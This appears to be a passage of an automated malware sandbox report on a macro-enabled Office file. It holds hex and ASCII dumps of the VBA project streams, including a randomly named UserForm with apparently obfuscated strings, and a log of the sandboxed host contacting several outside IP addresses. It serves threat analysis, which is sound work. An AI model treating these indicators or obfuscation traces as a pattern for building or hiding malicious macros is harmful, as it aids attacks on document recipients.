Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 04 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 00 00 00 05 00 b9 0c 00 00 00 00 00 00 69 09 00 00 00 00 00 00 91 09 00 00 00 00 00 00 e1 0c 00 00 00 00 00 00 ff ff ff ff 19 09 00 00 00 00 00 00 08 00 16 00 50 00 00 00 e1 09 00 00 00 00 00 00 b9 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_6, File Type: data, Stream Size: 157

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_6
CLSID:
File Type:	data
Stream Size:	157
Entropy:	2.43533120977128
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . $ . . . . . . . . . . . . ` . . ] . . . . . . . . . . , . A . . . . . . . . . . ` . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 07 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 24 00 01 01 00 00 00 00 07 00 00 00 03 60 00 00 5d 02 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 2c 00 41 01 00 00 00 00 07 00 01 00 03 60 04 00 60 02 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 19 02 00 00 00 00 01

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_7, File Type: data, Stream Size: 280

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_7
CLSID:
File Type:	data
Stream Size:	280
Entropy:	2.370018461368483
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` I . . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . 4 . P . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 06 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 59 0d 00 00 00 00 00 00 81 0d 00 00 00 00 00 00 a9 0d 00 00 00 00 00 00 ff ff ff ff 31 0d 00 00 00 00 00 00 08 00 10 00 34 00 00 00 d1 0d 00 00 00 00 00 00 f9 01 00 00 00 00 01 00 f9 0d

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 969

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	969
Entropy:	6.558515889473619
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . P z c ' . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
Data Raw:	01 c5 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 50 7a f3 63 27 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Stream Path: _VBA_PROJECT_CUR/bDSFgs4ysustjshgs/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	_VBA_PROJECT_CUR/bDSFgs4ysustjshgs/\x1CompObj
CLSID:
File Type:	data
Stream Size:	97
Entropy:	3.6106491830605214
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/bDSFgs4ysustjshgs/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 299

General
Stream Path:	_VBA_PROJECT_CUR/bDSFgs4ysustjshgs/\x3VBFrame
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	299
Entropy:	4.686323379489497
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } b D S F g s 4 y s u s t j s h g s . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 3 0 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 6 2 4 0 . . S t a r t U p P o s i t i o n = 1 ' C
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 62 44 53 46 67 73 34 79 73 75 73 74 6a 73 68 67 73 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67

Stream Path: _VBA_PROJECT_CUR/bDSFgs4ysustjshgs/f, File Type: data, Stream Size: 311

General
Stream Path:	_VBA_PROJECT_CUR/bDSFgs4ysustjshgs/f
CLSID:
File Type:	data
Stream Size:	311
Entropy:	4.387210312445827
Base64 Encoded:	False
Data ASCII:	. . $ . . . . . . . . . . . . . . . . } . . * . . . . . . . . . . . . . . R . . . . K Q . . . . D B . . . T a h o m a . . . . . . . . . . . k . . ( . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 1 . . { . . . . . . . . $ . . . . . . . . . . . 4 . . . . . . . T e x t B o x 1 . . . . . . . . X . . . . . . . % . . . . . . @ . . . . . . . C o m m a n d B u t t o n 1 . . R F e n A D A F e n A . D F e n A a t F e n A a S F e n A p a F e n A c e 6 } . { . . . . . . . . , . . . . . . . . . . . @ . . . . .
Data Raw:	00 04 24 00 08 0c 10 0c 04 00 00 00 ff ff 00 00 04 00 00 00 00 7d 00 00 ff 2a 00 00 e1 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 04 00 00 00 e4 00 00 00 00 84 01 6b 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 38 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 7b 02 00 00 f6

Stream Path: _VBA_PROJECT_CUR/bDSFgs4ysustjshgs/o, File Type: Intel ia64 COFF object file, not stripped, 24 sections, symbol offset=0x80000006, 1700946252 symbols, optional header size 12652, created Thu Jan 1 00:00:40 1970, Stream Size: 236

General
Stream Path:	_VBA_PROJECT_CUR/bDSFgs4ysustjshgs/o
CLSID:
File Type:	Intel ia64 COFF object file, not stripped, 24 sections, symbol offset=0x80000006, 1700946252 symbols, optional header size 12652, created Thu Jan 1 00:00:40 1970
Stream Size:	236
Entropy:	3.735583977902059
Base64 Encoded:	False
Data ASCII:	. . . . ( . . . . . . L a b e l 1 . . . . . { . . . . . . . 5 . . . . . . . . . . . . T a h o m a . . . . . . . . . . . . . . H , g . . . { . . . . . . . 5 . . . . . . . . . . . . T a h o m a . . . . . ( . . . . . . C o m m a n d B u t t o n 1 . . E . . . O . . . . . . . u . . . . . . . . . . . . T a h o m a . . . . . ( . . . . . . C o m m a n d B u t t o n 2 . . . . . . O . . . . . . . u . . . . . . . . . . . . T a h o m a . .
Data Raw:	00 02 18 00 28 00 00 00 06 00 00 80 4c 61 62 65 6c 31 00 00 ec 09 00 00 7b 02 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 14 00 01 01 00 80 00 00 00 00 1b 48 80 2c 67 0c 00 00 7b 02 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 20 00 28 00 00 00 0e 00 00 80 43 6f 6d 6d 61 6e 64 42

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 18:29:04.847368002 CET	49163	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:04.852310896 CET	80	49163	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:04.852369070 CET	49163	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:04.854330063 CET	49163	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:04.859122992 CET	80	49163	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:05.743300915 CET	80	49163	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:05.750052929 CET	80	49163	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:05.750138044 CET	49163	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:06.233154058 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:06.233186960 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:06.233278036 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:06.239236116 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:06.239249945 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:07.116163969 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:07.116298914 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:07.621087074 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:07.621125937 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:07.621495008 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:07.743248940 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:07.787327051 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.175244093 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.176268101 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.176278114 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.176317930 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.176347017 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:08.176381111 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.176428080 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:08.300070047 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.300086975 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.300120115 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.300154924 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:08.300182104 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:08.300190926 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.301088095 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.301095963 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.301141024 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:08.301147938 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.301693916 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.301738977 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:08.301744938 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.301840067 CET	443	49164	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:08.301888943 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:08.303976059 CET	49164	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:08.434361935 CET	49165	443	192.168.2.22	77.37.50.35
Nov 7, 2024 18:29:08.434406996 CET	443	49165	77.37.50.35	192.168.2.22
Nov 7, 2024 18:29:08.434464931 CET	49165	443	192.168.2.22	77.37.50.35
Nov 7, 2024 18:29:08.435054064 CET	49165	443	192.168.2.22	77.37.50.35
Nov 7, 2024 18:29:08.435066938 CET	443	49165	77.37.50.35	192.168.2.22
Nov 7, 2024 18:29:09.281891108 CET	443	49165	77.37.50.35	192.168.2.22
Nov 7, 2024 18:29:09.282335043 CET	49165	443	192.168.2.22	77.37.50.35
Nov 7, 2024 18:29:09.287333965 CET	49165	443	192.168.2.22	77.37.50.35
Nov 7, 2024 18:29:09.287354946 CET	443	49165	77.37.50.35	192.168.2.22
Nov 7, 2024 18:29:09.287621021 CET	443	49165	77.37.50.35	192.168.2.22
Nov 7, 2024 18:29:09.293210983 CET	49165	443	192.168.2.22	77.37.50.35
Nov 7, 2024 18:29:09.339332104 CET	443	49165	77.37.50.35	192.168.2.22
Nov 7, 2024 18:29:09.990796089 CET	443	49165	77.37.50.35	192.168.2.22
Nov 7, 2024 18:29:09.990865946 CET	443	49165	77.37.50.35	192.168.2.22
Nov 7, 2024 18:29:09.990942001 CET	49165	443	192.168.2.22	77.37.50.35
Nov 7, 2024 18:29:09.991333008 CET	49165	443	192.168.2.22	77.37.50.35
Nov 7, 2024 18:29:10.020697117 CET	49166	443	192.168.2.22	147.79.119.239
Nov 7, 2024 18:29:10.020739079 CET	443	49166	147.79.119.239	192.168.2.22
Nov 7, 2024 18:29:10.020826101 CET	49166	443	192.168.2.22	147.79.119.239
Nov 7, 2024 18:29:10.021230936 CET	49166	443	192.168.2.22	147.79.119.239
Nov 7, 2024 18:29:10.021248102 CET	443	49166	147.79.119.239	192.168.2.22
Nov 7, 2024 18:29:11.670973063 CET	443	49166	147.79.119.239	192.168.2.22
Nov 7, 2024 18:29:11.675483942 CET	49166	443	192.168.2.22	147.79.119.239
Nov 7, 2024 18:29:11.675587893 CET	443	49166	147.79.119.239	192.168.2.22
Nov 7, 2024 18:29:11.675765038 CET	49166	443	192.168.2.22	147.79.119.239
Nov 7, 2024 18:29:11.709255934 CET	49167	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:11.709302902 CET	443	49167	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:11.709374905 CET	49167	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:11.709788084 CET	49167	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:11.709805012 CET	443	49167	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:20.869748116 CET	80	49163	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:20.869818926 CET	49163	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:27.140889883 CET	49168	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:27.145840883 CET	80	49168	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:27.145944118 CET	49168	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:27.148351908 CET	49168	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:27.153193951 CET	80	49168	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:28.069406033 CET	80	49168	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:28.072619915 CET	80	49168	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:28.072690010 CET	49168	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:28.696152925 CET	443	49167	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:28.696247101 CET	49167	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:28.696752071 CET	49167	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:28.696772099 CET	443	49167	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:28.787679911 CET	49169	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:28.787729979 CET	443	49169	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:28.787800074 CET	49169	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:28.788130045 CET	49169	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:28.788139105 CET	443	49169	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:29.930675030 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:29.930726051 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:29.930794954 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:29.933207989 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:29.933228970 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:30.794802904 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:30.794985056 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:30.799336910 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:30.799350023 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:30.799607992 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:30.851610899 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:30.899334908 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.308403015 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.309401035 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.309423923 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.309441090 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.309469938 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:31.309492111 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.309504986 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:31.433983088 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.434006929 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.434087038 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:31.434106112 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.435146093 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.435153961 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.435180902 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.435211897 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:31.435226917 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.435295105 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:31.435367107 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.435421944 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:31.435427904 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.435481071 CET	443	49170	20.23.238.122	192.168.2.22
Nov 7, 2024 18:29:31.435533047 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:31.436357975 CET	49170	443	192.168.2.22	20.23.238.122
Nov 7, 2024 18:29:32.405970097 CET	49171	443	192.168.2.22	147.79.119.141
Nov 7, 2024 18:29:32.406021118 CET	443	49171	147.79.119.141	192.168.2.22
Nov 7, 2024 18:29:32.406079054 CET	49171	443	192.168.2.22	147.79.119.141
Nov 7, 2024 18:29:32.406829119 CET	49171	443	192.168.2.22	147.79.119.141
Nov 7, 2024 18:29:32.406841040 CET	443	49171	147.79.119.141	192.168.2.22
Nov 7, 2024 18:29:33.712090015 CET	49172	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:33.716973066 CET	80	49172	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:33.717029095 CET	49172	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:33.723911047 CET	49172	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:33.728657007 CET	80	49172	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:34.041516066 CET	443	49171	147.79.119.141	192.168.2.22
Nov 7, 2024 18:29:34.042463064 CET	49171	443	192.168.2.22	147.79.119.141
Nov 7, 2024 18:29:34.042653084 CET	443	49171	147.79.119.141	192.168.2.22
Nov 7, 2024 18:29:34.042716980 CET	49171	443	192.168.2.22	147.79.119.141
Nov 7, 2024 18:29:34.074709892 CET	49173	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:34.074740887 CET	443	49173	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:34.074809074 CET	49173	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:34.075284004 CET	49173	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:34.075294018 CET	443	49173	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:34.620887995 CET	80	49172	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:34.624624968 CET	80	49172	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:34.624685049 CET	49172	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:38.345541000 CET	49174	443	192.168.2.22	147.79.116.130
Nov 7, 2024 18:29:38.345576048 CET	443	49174	147.79.116.130	192.168.2.22
Nov 7, 2024 18:29:38.345642090 CET	49174	443	192.168.2.22	147.79.116.130
Nov 7, 2024 18:29:38.347668886 CET	49174	443	192.168.2.22	147.79.116.130
Nov 7, 2024 18:29:38.347682953 CET	443	49174	147.79.116.130	192.168.2.22
Nov 7, 2024 18:29:39.174182892 CET	443	49174	147.79.116.130	192.168.2.22
Nov 7, 2024 18:29:39.174261093 CET	49174	443	192.168.2.22	147.79.116.130
Nov 7, 2024 18:29:39.180412054 CET	49174	443	192.168.2.22	147.79.116.130
Nov 7, 2024 18:29:39.180423975 CET	443	49174	147.79.116.130	192.168.2.22
Nov 7, 2024 18:29:39.180665970 CET	443	49174	147.79.116.130	192.168.2.22
Nov 7, 2024 18:29:39.257128954 CET	49174	443	192.168.2.22	147.79.116.130
Nov 7, 2024 18:29:39.303328037 CET	443	49174	147.79.116.130	192.168.2.22
Nov 7, 2024 18:29:39.973648071 CET	443	49174	147.79.116.130	192.168.2.22
Nov 7, 2024 18:29:39.973711967 CET	443	49174	147.79.116.130	192.168.2.22
Nov 7, 2024 18:29:39.973884106 CET	49174	443	192.168.2.22	147.79.116.130
Nov 7, 2024 18:29:39.974450111 CET	49174	443	192.168.2.22	147.79.116.130
Nov 7, 2024 18:29:40.001372099 CET	49175	443	192.168.2.22	147.79.119.239
Nov 7, 2024 18:29:40.001404047 CET	443	49175	147.79.119.239	192.168.2.22
Nov 7, 2024 18:29:40.001466990 CET	49175	443	192.168.2.22	147.79.119.239
Nov 7, 2024 18:29:40.001769066 CET	49175	443	192.168.2.22	147.79.119.239
Nov 7, 2024 18:29:40.001777887 CET	443	49175	147.79.119.239	192.168.2.22
Nov 7, 2024 18:29:41.674549103 CET	443	49175	147.79.119.239	192.168.2.22
Nov 7, 2024 18:29:41.675923109 CET	49175	443	192.168.2.22	147.79.119.239
Nov 7, 2024 18:29:41.676023960 CET	443	49175	147.79.119.239	192.168.2.22
Nov 7, 2024 18:29:41.676088095 CET	49175	443	192.168.2.22	147.79.119.239
Nov 7, 2024 18:29:41.744900942 CET	49176	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:41.744946003 CET	443	49176	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:41.745018959 CET	49176	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:41.745553970 CET	49176	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:41.745570898 CET	443	49176	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:43.194937944 CET	80	49168	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:43.194993019 CET	49168	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:45.769731998 CET	443	49169	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:45.769994020 CET	49169	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:45.771102905 CET	49169	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:45.771121979 CET	443	49169	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:48.149565935 CET	49177	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:29:48.149619102 CET	443	49177	188.114.96.3	192.168.2.22
Nov 7, 2024 18:29:48.149684906 CET	49177	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:29:48.150178909 CET	49177	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:29:48.150188923 CET	443	49177	188.114.96.3	192.168.2.22
Nov 7, 2024 18:29:48.774038076 CET	443	49177	188.114.96.3	192.168.2.22
Nov 7, 2024 18:29:48.774211884 CET	49177	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:29:48.778511047 CET	49177	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:29:48.778527021 CET	443	49177	188.114.96.3	192.168.2.22
Nov 7, 2024 18:29:48.778876066 CET	443	49177	188.114.96.3	192.168.2.22
Nov 7, 2024 18:29:48.781086922 CET	49177	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:29:48.827328920 CET	443	49177	188.114.96.3	192.168.2.22
Nov 7, 2024 18:29:49.184288025 CET	443	49177	188.114.96.3	192.168.2.22
Nov 7, 2024 18:29:49.184370995 CET	443	49177	188.114.96.3	192.168.2.22
Nov 7, 2024 18:29:49.184413910 CET	49177	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:29:49.186760902 CET	49177	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:29:49.218800068 CET	49178	443	192.168.2.22	15.197.148.33
Nov 7, 2024 18:29:49.218827009 CET	443	49178	15.197.148.33	192.168.2.22
Nov 7, 2024 18:29:49.218871117 CET	49178	443	192.168.2.22	15.197.148.33
Nov 7, 2024 18:29:49.219424963 CET	49178	443	192.168.2.22	15.197.148.33
Nov 7, 2024 18:29:49.219449043 CET	443	49178	15.197.148.33	192.168.2.22
Nov 7, 2024 18:29:49.744983912 CET	80	49172	217.160.0.236	192.168.2.22
Nov 7, 2024 18:29:49.745044947 CET	49172	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:49.862582922 CET	443	49178	15.197.148.33	192.168.2.22
Nov 7, 2024 18:29:49.862711906 CET	49178	443	192.168.2.22	15.197.148.33
Nov 7, 2024 18:29:49.867402077 CET	49178	443	192.168.2.22	15.197.148.33
Nov 7, 2024 18:29:49.867419958 CET	443	49178	15.197.148.33	192.168.2.22
Nov 7, 2024 18:29:49.867691040 CET	443	49178	15.197.148.33	192.168.2.22
Nov 7, 2024 18:29:49.869802952 CET	49178	443	192.168.2.22	15.197.148.33
Nov 7, 2024 18:29:49.915330887 CET	443	49178	15.197.148.33	192.168.2.22
Nov 7, 2024 18:29:50.025501966 CET	443	49178	15.197.148.33	192.168.2.22
Nov 7, 2024 18:29:50.025576115 CET	443	49178	15.197.148.33	192.168.2.22
Nov 7, 2024 18:29:50.025741100 CET	49178	443	192.168.2.22	15.197.148.33
Nov 7, 2024 18:29:50.042468071 CET	49178	443	192.168.2.22	15.197.148.33
Nov 7, 2024 18:29:50.083200932 CET	49179	443	192.168.2.22	63.250.43.10
Nov 7, 2024 18:29:50.083257914 CET	443	49179	63.250.43.10	192.168.2.22
Nov 7, 2024 18:29:50.083400965 CET	49179	443	192.168.2.22	63.250.43.10
Nov 7, 2024 18:29:50.083460093 CET	49179	443	192.168.2.22	63.250.43.10
